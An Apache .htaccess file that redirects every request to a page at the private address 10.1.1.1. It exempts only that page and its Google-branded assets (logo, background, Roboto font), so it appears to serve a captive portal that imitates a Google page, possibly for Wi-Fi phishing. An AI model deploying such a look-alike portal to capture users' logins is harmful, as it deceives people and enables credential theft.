RewriteEngine on
RewriteCond %{REQUEST_URI} !(\/index\.php)$
RewriteCond %{REQUEST_URI} !(\/styles\.css)$
RewriteCond %{REQUEST_URI} !(\/google_logo\.gif)$
RewriteCond %{REQUEST_URI} !(\/caret\.gif)$
RewriteCond %{REQUEST_URI} !(\/google_background\.jpg)$
RewriteCond %{REQUEST_URI} !(\/Roboto-Regular\.ttf)$
RewriteRule ^(.*)$ http://10.1.1.1/index.php [L,R=301]
